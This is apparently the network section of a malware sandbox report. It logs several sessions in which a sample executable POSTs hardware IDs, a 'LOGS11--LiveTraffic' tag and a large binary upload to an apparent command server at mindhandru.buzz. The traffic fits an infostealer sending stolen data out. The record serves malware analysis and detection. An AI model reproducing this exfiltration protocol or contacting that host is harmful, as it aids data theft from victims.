2	192.168.2.7	49721	172.67.165.185	443	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:27 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PR1F7NARWY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12802 Host: mindhandru.buzz
2024-12-26 11:41:27 UTC	12802	OUT	Data Raw: 2d 2d 50 52 31 46 37 4e 41 52 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 33 33 39 34 31 44 36 44 42 39 32 37 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 50 52 31 46 37 4e 41 52 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 52 31 46 37 4e 41 52 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 52 31 46 37 4e 41 52 57 59 0d 0a 43 6f Data Ascii: --PR1F7NARWYContent-Disposition: form-data; name="hwid"1133941D6DB92719BEBA0C6A975F1733--PR1F7NARWYContent-Disposition: form-data; name="pid"2--PR1F7NARWYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--PR1F7NARWYCo
2024-12-26 11:41:28 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cjq3sbrt43tjufe4fc8hb8nhdh; expires=Mon, 21 Apr 2025 05:28:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RwLGGaJiGjwastXTKliBurXkkzVsIiSS4wVFmtD8JSZg2ZdJ8FcNY81CzTdbxzzAqN2JeDikA7lgXheW6jnC2jKrlY6QO9RcZUinx5FxORxQpblftMo%2BDR5LWUojDMEy%2FEE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd484e697cb2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1780&rtt_var=684&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13733&delivery_rate=1581798&cwnd=216&unsent_bytes=0&cid=1f6bab7045626025&ts=1061&x=0"
2024-12-26 11:41:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:41:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49726	172.67.165.185	443	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:30 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WAM343RP3AMG7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15052 Host: mindhandru.buzz
2024-12-26 11:41:30 UTC	15052	OUT	Data Raw: 2d 2d 57 41 4d 33 34 33 52 50 33 41 4d 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 33 33 39 34 31 44 36 44 42 39 32 37 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 57 41 4d 33 34 33 52 50 33 41 4d 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 41 4d 33 34 33 52 50 33 41 4d 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 57 41 4d 33 34 Data Ascii: --WAM343RP3AMG7Content-Disposition: form-data; name="hwid"1133941D6DB92719BEBA0C6A975F1733--WAM343RP3AMG7Content-Disposition: form-data; name="pid"2--WAM343RP3AMG7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--WAM34
2024-12-26 11:41:30 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ap6e04f1ho3qq7ef2fd471ejmr; expires=Mon, 21 Apr 2025 05:28:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FaMEyxf8HdO50zUBnD81VEwncarSmOg4aEH%2Bt2o0S8Y55XOKo8cUfu%2FPxpKKSU9WgZO4ht9KEinP8GZ4DgIFa5ZpC4%2BdXDleRjeVQTmLVCLYERbIeTH2hgh7i68hYNGFMes%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd57cc6243f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1977&rtt_var=760&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15986&delivery_rate=1421616&cwnd=207&unsent_bytes=0&cid=0842576545894de3&ts=954&x=0"
2024-12-26 11:41:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:41:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49732	172.67.165.185	443	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:32 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5K7RWHZW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20347 Host: mindhandru.buzz
2024-12-26 11:41:32 UTC	15331	OUT	Data Raw: 2d 2d 35 4b 37 52 57 48 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 33 33 39 34 31 44 36 44 42 39 32 37 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 4b 37 52 57 48 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 4b 37 52 57 48 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 4b 37 52 57 48 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --5K7RWHZWContent-Disposition: form-data; name="hwid"1133941D6DB92719BEBA0C6A975F1733--5K7RWHZWContent-Disposition: form-data; name="pid"3--5K7RWHZWContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5K7RWHZWContent-Di
2024-12-26 11:41:32 UTC	5016	OUT	Data Raw: 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9f Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-26 11:41:33 UTC	1132	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i17v3sa7fl666lfeqvl778dd5h; expires=Mon, 21 Apr 2025 05:28:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AEujaFyywkk5dQ9X7nZqA54qr9cCbUpf62p%2BBY2qWgXZ5W82AM8cYgtJmdilAI0JHdAU1fqrTH42jD%2Bbpsz00UhkV0%2FdcVWMc%2BokYCE0bhew2QGT%2BzynuBJNtgeFEOt5cKI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd6828e11a30-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1835&min_rtt=1828&rtt_var=700&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21298&delivery_rate=1547429&cwnd=252&unsent_bytes=0&cid=39a355855df37294&ts=1103&x=0"
2024-12-26 11:41:33 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:41:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49742	172.67.165.185	443	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:35 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PLB202FM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1174 Host: mindhandru.buzz
2024-12-26 11:41:35 UTC	1174	OUT	Data Raw: 2d 2d 50 4c 42 32 30 32 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 33 33 39 34 31 44 36 44 42 39 32 37 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 50 4c 42 32 30 32 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4c 42 32 30 32 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 4c 42 32 30 32 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --PLB202FMContent-Disposition: form-data; name="hwid"1133941D6DB92719BEBA0C6A975F1733--PLB202FMContent-Disposition: form-data; name="pid"1--PLB202FMContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--PLB202FMContent-Di
2024-12-26 11:41:35 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eh3oiesagm2nnb217tb3rhflj9; expires=Mon, 21 Apr 2025 05:28:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Br8a6qYduw5zVqIkl1JQlbS2LJVVfUZbsoK5VASDSqhg8VbJfzE49gkj%2BvCMJ3dNGIiD5hLF7MO20%2FspPhpNIK0YfiSSgGDjRJp%2F3TKnTdUfW1eToPpctEJ1iOETUCtid5k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd785fe4c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1634&rtt_var=627&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2080&delivery_rate=1726788&cwnd=228&unsent_bytes=0&cid=840497971f79a03e&ts=780&x=0"
2024-12-26 11:41:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:41:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49750	172.67.165.185	443	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:37 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4MEV114D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551650 Host: mindhandru.buzz
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: 2d 2d 34 4d 45 56 31 31 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 33 33 39 34 31 44 36 44 42 39 32 37 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 34 4d 45 56 31 31 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 4d 45 56 31 31 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 34 4d 45 56 31 31 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --4MEV114DContent-Disposition: form-data; name="hwid"1133941D6DB92719BEBA0C6A975F1733--4MEV114DContent-Disposition: form-data; name="pid"1--4MEV114DContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--4MEV114DContent-Di
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: 4a 3a af 4d bb 31 52 88 57 ac 02 0e 77 88 9b 14 1b 57 58 86 56 04 7f 86 f6 7d 58 ff f5 8d 36 88 7b f3 ae 9d b0 ad c2 b7 0b d1 2f 93 b9 1e 0c 5f d4 3e 70 49 5f 7b 30 d4 b6 4e f8 89 90 44 54 38 81 2b ca 7f 6d e1 f1 c4 a8 9c 4c 2c 1c 16 4d 7b 10 60 2f 02 cb 65 cb 2d 8c 19 7c 1a ab b9 c7 15 99 f7 e6 41 68 8f 2f 5e 04 f5 8a 8f b8 77 77 fd 7c 31 1e 8c a2 f8 97 b6 cb 32 e6 9c 32 1a c3 75 f9 88 6f 41 72 c8 be 85 f2 8e f8 99 bf 91 e2 8f e0 c7 93 15 00 fd f4 d9 c4 cf d8 cc 1b 7b e1 92 7f a6 fb 08 02 54 3e a2 ae f6 92 74 2c b5 32 77 66 65 89 45 1f d8 d3 85 a7 fb 71 84 99 4e 5a 24 72 7d a4 11 36 e2 0d 20 e5 d4 f4 93 4e 15 5d d2 e9 f9 7e b2 1c 77 7d f9 61 c8 a4 58 57 95 18 eb e3 f7 6a c9 a1 1f 7a 54 d9 09 62 7f 1e 12 39 d7 f8 67 bf b4 1f 57 ff f4 6c 70 08 67 8e 93 30 Data Ascii: J:M1RWwWXV}X6{/_>pI_{0NDT8+mL,M{`/e-\|Ah/^ww\|122uoAr{T>t,2wfeEqNZ$r}6 N]~w}aXWjzTb9gWlpg0
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: 1a 7e 9c 67 8a 96 14 3b f2 ef 9b 5a 02 fa 8d ed 90 1b 8e d8 44 c0 a3 c0 ea d3 9b 54 27 51 92 24 a5 8f 57 4d fa 93 12 c3 02 38 15 02 35 1e 68 60 e6 63 96 05 9f 71 5e ff 19 41 35 d9 4b 5d 8c 33 aa 18 01 d9 aa 57 5e 43 16 ab f6 a5 0a 19 6e b6 9d 21 0e c2 79 bd 02 f8 59 b1 b5 6e 88 7d 2c ea e6 e9 ab c6 4c 2a 9f f9 e4 82 1c f7 bc cb 21 2c 6c f9 ae 8b 39 da 1e bd b4 21 94 71 e3 6c ae 4a ed 61 09 f3 df 95 f9 29 2d 59 24 10 25 70 6c 93 73 7b fd 1d b2 1c df 69 60 a7 74 8e a8 5f f1 43 ef db 54 e6 fb 42 f5 e3 b9 71 24 f5 2d 95 ae b4 2f df a3 46 4f c1 2a d3 1a e7 f4 19 d2 1e 21 f1 f7 89 df d7 da 9e 6e 25 23 81 d4 2e a2 ec 74 6a 87 da 6a 65 00 b6 62 13 86 45 61 59 92 4c 62 79 d3 a4 4a 9b 3c ca 20 7f 2a 3c d2 68 70 cc a8 64 fb eb ca c4 00 1c f0 78 a1 17 81 95 a8 2b f1 Data Ascii: ~g;ZDT'Q$WM85h`cq^A5K]3W^Cn!yYn},L!,l9!qlJa)-Y$%pls{i`t_CTBq$-/FO!n%#.tjjebEaYLbyJ< *<hpdx+
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: 72 ff c7 f5 e3 c1 c4 b2 bc f9 9a ae bb 21 e5 c7 98 e6 dd 16 05 e9 d3 9c da 14 33 eb 41 77 88 f9 a2 ff 14 f1 7d ab 52 f5 0d 10 77 d0 d3 b7 13 eb 82 ae 6c 6e f9 e5 b9 ed 5c a0 72 a7 6f ee ec 81 c1 46 da 0f b1 78 95 27 91 d7 47 fb 28 01 9b f6 78 bc 05 3e 9b c4 cc 50 9f b3 b6 a5 ee 0b 54 ea 5c 8f 77 f6 b8 67 e1 7d 8c 94 cf 8f 9e 5c 1b d9 ba ce dd 9a 4f ec f1 48 f6 29 57 01 36 7e 5d 9a 5d 12 22 37 4b f7 fb 28 4f 39 04 6d c3 6c 74 c3 af fa cc fa 43 67 c7 b8 af fd ac 47 ea 12 f8 98 e5 43 fa c2 b8 a2 4d c5 1d e7 35 86 1e 8a dc 3a d9 73 2b b1 93 5e dc 8d f5 c5 ed c1 7b 90 14 42 a7 10 b1 26 ba 63 62 c4 c5 60 1b d1 fa d4 f3 4a 6d 29 92 0a 42 bf b7 51 34 3f 30 bc 04 a6 7a be ff 69 0b 2b a5 7e 2a e5 4e 55 fe 72 93 36 56 c1 dd f2 67 0f 3d a1 68 46 05 81 10 91 a0 93 3d Data Ascii: r!3Aw}Rwln\roFx'G(x>PT\wg}\OH)W6~]]"7K(O9mltCgGCM5:s+^{B&cb`Jm)BQ4?0zi+~*NUr6Vg=hF=
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: 97 d4 b1 f8 ef 73 35 7e 7f 13 52 2d 4f 42 ad 93 4f fb 36 f7 7f 7a 6a 85 ed 33 2b 6f bc c4 aa 1a fd fe b4 4f 36 2f ed 3e f1 77 f5 c7 59 8f f1 3b 94 e4 4c ab e7 75 57 79 2f 56 32 86 be 3c 15 d0 76 03 94 7a 53 60 6c 5a 5b 33 2c b2 0d 3d 56 b2 79 bb f7 7d 39 bc 6e ef 54 ae 74 45 ec 36 60 e3 a7 ed 66 b2 40 3e 92 35 f4 1b 0d 21 80 a7 0c 27 ff a9 c5 b3 7a 4e 12 27 ca 2f 32 b9 67 87 5a 3b 52 78 37 7b d6 c3 3b 94 73 f2 c8 01 6c d5 99 a2 22 68 72 a6 e8 b3 62 aa 4c 93 1e 8c 89 92 ed 76 7e 12 2e 92 2c 6c 8b 38 9a 25 d1 35 b7 0c 6a 72 22 d9 91 53 c7 7a f5 f2 af ae 86 a8 7e 07 e1 35 7c 9f e9 bb 8a 43 03 c7 e9 af a8 49 2d 88 30 fe e5 31 8e 9b 4a 3f b4 69 3a 35 f6 51 62 d1 ad 82 33 71 e2 93 1e 30 17 c0 98 cd 99 e2 fd 36 ba ba bc dc 14 29 4a 6e 4a 23 35 f1 7c ee 63 19 92 Data Ascii: s5~R-OBO6zj3+oO6/>wY;LuWy/V2<vzS`lZ[3,=Vy}9nTtE6`f@>5!'zN'/2gZ;Rx7{;sl"hrbLv~.,l8%5jr"Sz~5\|CI-01J?i:5Qb3q06)JnJ#5\|c
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: fb fe 47 73 e4 7a 4a a8 40 61 7f f2 88 95 49 7a 4c f8 4d 3e d2 53 78 36 d5 84 42 f6 5c 9f 9e 5b 00 44 06 19 98 74 e2 39 77 32 ca f4 e0 77 13 a9 b5 fb f1 29 28 fa ea 45 83 06 c2 b8 34 7a cc 35 c8 98 0b 32 cb 78 e9 76 8f f7 56 d3 c6 f2 ef 8f cf df b2 22 40 cb d2 be 73 28 7f 1f 3a eb 92 0f 3d 56 69 2d 39 03 8d 07 41 2b 1e f6 82 6b 5d 2a 02 4a 80 eb d9 db 36 57 1b 5b 8d 4b 94 ec a8 dd 90 22 b3 78 ef 9c fe 3c 77 15 5f 0d 5f 5f 51 fe 90 18 28 07 ca b4 00 15 e2 76 07 47 9c 5b e7 50 e8 94 62 be b7 5d 5a 55 17 fa 8f 5b fa f2 1d eb 8f 78 69 ed 7b ed a7 4b 61 fe 38 1f 06 54 2d 3d 0e 96 82 14 25 50 89 53 c4 1d 40 2d 0a fe 7d 05 20 8e 73 cb 22 94 02 92 c2 ad 8f 57 ba 64 e0 22 2c d8 07 0d 61 90 d4 5f 5c 8d 42 e7 87 e8 a7 2e f1 59 12 00 c2 0d da 4f d0 4d 48 a4 03 8e a0 Data Ascii: GszJ@aIzLM>Sx6B\[Dt9w2w)(E4z52xvV"@s(:=Vi-9A+k]*J6W[K"x<w___Q(vG[Pb]ZU[xi{Ka8T-=%PS@-} s"Wd",a_\B.YOMH
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: 34 1e 20 71 17 91 2c bd bb 12 60 ca 49 14 33 71 8a 96 26 c2 38 ed c1 c8 79 60 46 88 8b 3a c7 cf c7 05 72 aa 59 ab 27 17 7b a0 c1 d6 91 97 37 77 3e 9e 34 11 c1 4e 4b 46 b6 8b 52 c6 97 3c 0e 56 02 df fb f1 8f e0 cd 82 79 20 48 e4 05 47 11 5f 24 4a 0f a2 4d 29 d8 b6 89 8d eb 23 b0 41 35 22 88 1f bf d0 25 e8 a3 44 3d 26 74 aa 2a 9f a8 c9 85 36 57 ec 55 c2 8e 5f 33 31 23 54 b1 ab 2c 9c 88 3b 89 49 c6 72 45 fb e4 79 96 ca 3f ea 38 4c 78 2a 35 4e cf fe 38 8a 8e de ce 22 7b d0 e5 f3 de a3 22 40 78 f7 52 fe ce f0 dc 81 5f 0a 81 22 6f f6 48 dc 33 a9 5a 05 d3 f4 4e 0e 7a e4 20 5f 56 d9 92 c7 a3 d8 de fd 9e 43 98 cd 46 9d a3 5c a7 0e d0 97 b5 83 75 df 7a 58 4d 4f f0 7e dd 6c 34 52 70 d3 aa 4e 8f 31 9d 59 2e c3 9d 81 72 a2 e2 93 1a 50 f0 43 04 41 9d cd 19 f3 47 b7 69 Data Ascii: 4 q,`I3q&8y`F:rY'{7w>4NKFR<Vy HG_$JM)#A5"%D=&t6WU_31#T,;IrEy?8Lx5N8"{"@xR_"oH3ZNz _VCF\uzXMO~l4RpN1Y.rPCAGi
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: 85 d0 fe c2 af 46 20 9e 34 7f e9 ce 8d d7 3a 82 0b 97 d0 0d ac 6f f5 0c 26 ca b6 d1 f6 49 5f 30 cd 71 3a 8d c2 4b 0c c4 89 1b 73 e4 a0 d1 91 8e 86 3d a6 49 27 a4 4f ce 53 ff 6f 8d fc 2c 1f 78 e9 0a 0f 68 83 a2 7f 21 dd 01 8e f2 bb 5c f1 40 8c 12 88 04 7e bb ea 8e 58 9c 83 0a 1a 01 6d e3 1b 6a b1 f3 5f 22 4d 40 0a 5d 60 43 0c 3b cd a0 3e 3c 4b ec 38 06 06 c4 88 5d 5a 43 94 b8 56 01 1b 02 a0 61 19 3c 93 c4 d6 6b 84 4a a8 0c 1c a7 7b 24 b0 da 5c c4 f1 39 08 1a 80 78 37 b2 cd 4c da 20 3e 02 8e 78 46 86 5c 89 dd 5b 89 10 bf 67 dc 14 75 7e d1 34 5e 9e 3e b2 79 ff ad 05 c1 67 20 3a 2f 5c 0b da 29 9c 80 0a cd ed ac cd 1d c4 a4 10 8b 82 88 ab f5 98 d8 34 ff f5 5c df 46 a9 9f b4 00 7e 0f 71 bc 02 c0 6f 14 ed b4 37 98 54 43 31 77 4b 94 b7 72 b4 d8 ed 08 53 69 81 7b Data Ascii: F 4:o&I_0q:Ks=I'OSo,xh!\@~Xmj_"M@]`C;><K8]ZCVa<kJ{$\9x7L >xF\[gu~4^>yg :/\)4\F~qo7TC1wKrSi{
